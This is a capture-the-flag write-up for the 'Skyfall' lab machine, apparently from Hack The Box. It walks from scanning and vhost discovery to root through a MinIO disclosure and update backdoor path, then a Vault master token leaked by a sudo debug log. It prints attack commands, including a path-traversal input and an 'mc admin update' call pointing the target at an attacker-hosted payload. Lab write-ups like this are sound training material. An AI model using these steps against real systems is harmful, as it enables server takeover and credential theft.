# Nmap 7.94SVN scan initiated Mon Feb 5 03:50:17 2024 as: nmap -sCV -T4 --min-rate 10000 -p- -v -oA nmap/tcp_default 10.129.216.173 Nmap scan report for 10.129.216.173 Host is up (0.027s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA) |_ 256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Skyfall - Introducing Sky Storage! |_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34 | http-methods: |_ Supported Methods: GET HEAD |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Feb 5 03:50:32 2024 -- 1 IP address (1 host up) scanned in 14.17 seconds
Only ports 22 and 80 are opened. So we are probably dealing with a webserver. I did not find any UDP ports opened.
2. Webserver
We can see the domain name on the about us contact information:
The domain is skyfall.htb the rest of the website looks like a stockpage. So we may try to fuzz for vhosts.
We find “demo” as a vhost and add it to our hostfile.
1
http://demo.skyfall.htb/login
We can find a login page that tells us the demo login is guest/guest. If we login, we can see a dashboard with a lot of functionality:
I also noticed that sky storage is powered by Flask:
This would mean that the backend is Python based.
File functionality
We can see that there is a file upload/download functionality, like a dropbox. If we download a file we can see this request:
It gets the file by just the filename. Maybe there is a check in the background with our session, but lets check for LFI by changing welcome.pdf to ../../../../etc/passwd. If we hit send we can see a error:
Its a S3 operation failed error. It says that our signate does not match. Now we know that the app is using S3 buckets. We could also see a page “MinIO metrics” but we cannot access it as user guest. This lead me to this github repo “evil_minio” https://github.com/AbelChe/evil_minio. Wich states that:
Our attack path would be:
1. Get credentials with arn:aws:s3 permissions.
2. configures a MinIO client to interact with the vulnerable instance using the credentials gotten in Step 1. For this, the following command lines are required:mc alias set [ALIAS] [URL_TARGET_MINIO] [ACCESS_KEY] [SECRET_KEY] mc alias list
3. Attackers trigger the update process on the compromised MinIO instance, pointing to a malicious payload hosted on a remote server. For this, the following command is executed.mc admin update [ALIAS] [MIRROR_URL] –yes
4. “Evil” MinIO is installed, now containing a global backdoor that allows the attacker to execute commands on the host.
We can find an information disclosure vulnerability. But we would need to know the s3 bucket subdomain. We can find the domain with a 403 bypass on the /metrics page:
┌──(kali㉿kali)-[~/htb/skyfall] └─$ ./mc admin update miniobreachuser http://10.10.14.118:8080/minio -y mc: <ERROR> Unable to update the server. The specified method is not allowed against this resource.
3. User askyy
Lets continue by enumerating the bucket. Next, we can ls the bucket to list files:
1 2 3 4 5 6 7
──(kali㉿kali)-[~/htb/skyfall] └─$ ./mc ls --recursive --versions miniobreachuser [2023-11-07 23:59:15 EST] 0B askyy/ [2023-11-08 00:35:28 EST] 48KiB STANDARD bba1fcc2-331d-41d4-845b-0887152f19ec v1 PUT askyy/Welcome.pdf [2023-11-09 16:37:25 EST] 2.5KiB STANDARD 25835695-5e73-4c13-82f7-30fd2da2cf61 v3 PUT askyy/home_backup.tar.gz [2023-11-09 16:37:09 EST] 2.6KiB STANDARD 2b75346d-2a47-4203-ab09-3c9f878466b8 v2 PUT askyy/home_backup.tar.gz [2023-11-09 16:36:30 EST] 1.2MiB STANDARD 3c498578-8dfe-43b7-b679-32a3fe42018f v1 PUT askyy/home_backup.tar.gz
This system has been minimized by removing packages and content that are not required on a system that usersdo not log into.
To restore this content, you can run the 'unminimize'command. askyy@skyfall:~$ id uid=1000(askyy) gid=1000(askyy) groups=1000(askyy)
4. PE to root
Askyy can run two commands as root:
1 2 3 4 5 6 7
askyy@skyfall:~$ sudo -l Matching Defaults entries for askyy on skyfall: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User askyy may run the following commands on skyfall: (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml [-vhd]* (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml
If we use the -d for debug mode, we can see that it writes the output to debug.log:
1 2 3 4 5 6 7 8 9 10
askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -vd [+] Reading: /etc/vault-unseal.yaml [-] Security Risk! [+] Found Vault node: http://prd23-vault-internal.skyfall.htb [>] Check interval: 5s [>] Max checks: 5 [>] Checking seal status [+] Vault sealed: false askyy@skyfall:~$ ls debug.log user.txt
However, it is our home directory, so we can first create a empty file debug.log and chmod 777 on it:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
askyy@skyfall:~$ rm debug.log rm: remove write-protected regular file 'debug.log'? y askyy@skyfall:~$ touch debug.log askyy@skyfall:~$ chmod 777 debug.log askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -vd [+] Reading: /etc/vault-unseal.yaml [-] Security Risk! [+] Found Vault node: http://prd23-vault-internal.skyfall.htb [>] Check interval: 5s [>] Max checks: 5 [>] Checking seal status [+] Vault sealed: false askyy@skyfall:~$ cat debug.log 2024/02/05 12:20:46 Initializing logger... 2024/02/05 12:20:46 Reading: /etc/vault-unseal.yaml 2024/02/05 12:20:46 Security Risk! 2024/02/05 12:20:46 Master token found in config: hvs.I0ewVsmaKU1SwVZAKR3T0mmG 2024/02/05 12:20:46 Found Vault node: http://prd23-vault-internal.skyfall.ht
Now we find the master token “hvs.I0ewVsmaKU1SwVZAKR3T0mmG”. We can now generate a OTP for root:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
┌──(kali㉿kali)-[~/htb/skyfall/home_backup.tar.gz/terraform-generator] └─$ export VAULT_TOKEN="hvs.I0ewVsmaKU1SwVZAKR3T0mmG" ┌──(kali㉿kali)-[~/htb/skyfall/home_backup.tar.gz/terraform-generator] └─$ vault login Token (will be hidden): WARNING! The VAULT_TOKEN environment variable is set! The value of this ──(kali㉿kali)-[~/htb/skyfall/home_backup.tar.gz/terraform-generator] └─$ curl \ --header "X-Vault-Token: $VAULT_TOKEN" \ --request POST \ --data '{"ip":"10.129.216.173", "username":"root"}' \ $VAULT_ADDR/v1/ssh/creds/admin_otp_key_role {"request_id":"3f7d5821-7714-8810-c4b8-38e4a5e9fbe0","lease_id":"ssh/creds/admin_otp_key_role/HCx7t0alHiguezUYajSYvoeZ","renewable":false,"lease_duration":2764800,"data":{"ip":"10.129.216.173","key":"742da986-bdee-febe-24b1-cefd4c007b49","key_type":"otp","port":22,"username":"root"},"wrap_info":null,"warnings":null,"auth":null}
This system has been minimized by removing packages and content that are not required on a system that usersdo not log into.
To restore this content, you can run the 'unminimize'command. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Jan 30 12:17:37 2024 root@skyfall:~# id uid=0(root) gid=0(root) groups=0(root)